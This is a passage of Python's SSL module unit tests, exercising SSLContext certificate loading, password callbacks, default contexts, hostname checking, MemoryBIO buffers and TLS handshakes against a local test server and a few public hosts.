return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SIGNING_CA)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
